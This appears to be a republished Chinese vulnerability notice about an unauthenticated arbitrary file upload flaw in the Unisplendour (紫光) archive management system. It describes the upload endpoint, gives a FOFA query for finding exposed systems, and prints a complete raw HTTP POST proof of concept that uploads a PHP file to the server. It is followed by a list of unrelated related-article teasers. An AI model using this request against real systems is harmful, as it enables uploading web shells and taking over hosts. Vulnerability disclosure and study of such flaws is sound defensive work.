紫光档案管理系统文件上传漏洞

embedded/2024/10/21 9:24:28/

漏洞描述

紫光电子档案管理系统上传接口/System/Cms/upload.html存在未授权访问,导致任意文件上传漏洞,恶意攻击者可以直接上传恶意PHP后门文件,恶意PHP代码能够解析执行造成主机权限丢失,严重威胁系统以及数据相关安全

漏洞复现

FOFA

紫光档案管理系统

POC

POST /System/Cms/upload.html?token= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 554
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="md.php"hack
------WebKitFormBoundary3enKbCUwg60aGZcr--

上传成功

访问查看


http://www.ppmy.cn/embedded/129232.html

相关文章

Codeforces Round 979 (Div. 2)

A. A Gift From Orangutan 题意&#xff1a; 思路&#xff1a; 贪心 模拟 重新排列的数组 -> 最大的元素放第一个位置 &#xff0c;最小的元素放第二个位置 #include<bits/stdc.h> using namespace std; #define lowbit(x) ( x & -x )#define int long long ty…

AI学习指南深度学习篇-自编码器的python实践

AI学习指南深度学习篇 - 自编码器的Python实践 自编码器是一种无监督学习算法&#xff0c;通常用于数据降维、特征学习和图像重构。它通过将输入数据编码成一个紧凑的表示方式&#xff0c;然后再将其解码回原始数据。本文将深入探讨自编码器的原理&#xff0c;并提供在Python中…

近似推断 - 引言篇

前言 在人工智能的浩瀚领域中&#xff0c;深度学习如同一颗璀璨的明星&#xff0c;引领着技术的前沿。作为其核心组成部分&#xff0c;近似推断在深度学习的模型训练与预测中扮演着至关重要的角色。近似推断&#xff0c;简而言之&#xff0c;是在面对复杂、高维的概率模型时&a…

使用ROS一键部署LNMP环境

LNMP是目前主流的网站服务器架构之一&#xff0c;适合运行大型和高并发的网站应用&#xff0c;例如电子商务网站、社交网络、内容管理系统等。LNMP分别代表Linux、Nginx、MySQL和PHP。本文介绍如何使用阿里云资源编排服务&#xff08;ROS&#xff09;一键部署LNMP环境。 前提条…

ReactOS系统中搜索给定长度的空间地址区间中的二叉树

搜索给定长度的空间地址区间 //搜索给定长度的空间地址区间 MmFindGapTopDown PVOID NTAPI MmFindGap(PMADDRESS_SPACE AddressSpace,ULONG_PTR Length,ULONG_PTR Granularity,BOOLEAN TopDown );PMADDRESS_SPACE AddressSpace,//该进程用户空间 ULONG_PTR Length,//寻找的空…

基于Neo4j的水稻病虫害问答系统

你是否在寻找一个兼具技术深度和应用价值的毕业设计&#xff1f;那你千万别错过这个基于Neo4j的水稻病虫害问答系统&#xff01; 这款项目利用了前沿的知识图谱技术&#xff0c;在Neo4j图数据库和Django框架的双重保障下&#xff0c;为用户提供了一个针对水稻病虫害的知识问答…

二、Linux 入门教程:开启大数据领域的神奇之旅

Linux 入门教程&#xff1a;开启大数据领域的神奇之旅 在当今这个飞速发展的数字化时代&#xff0c;大数据所具有的重要性正日益凸显出来。而 Linux 作为一种极为强大的操作系统&#xff0c;在大数据这一广阔的领域当中发挥着至关重要、不可或缺的关键作用。倘若你怀有涉足大数…

[ElasticSearch]分析京东商城商品搜索实现|聚合|全文查找|搜索引擎|ES Java High Level Rest Client|ES Java API Client

文章目录 背景Elasticsearch 背景介绍Elasticsearch 在商城搜索中的应用 Elasticsearch版本选择Elasticsearch环境搭建京东商城搜索页面搜索显示器上部分聚合结果&#xff0c;下部分是商品列表限制搜索100页&#xff0c;一页50个商品&#xff0c;允许跳页 搜索大床上部分聚合结…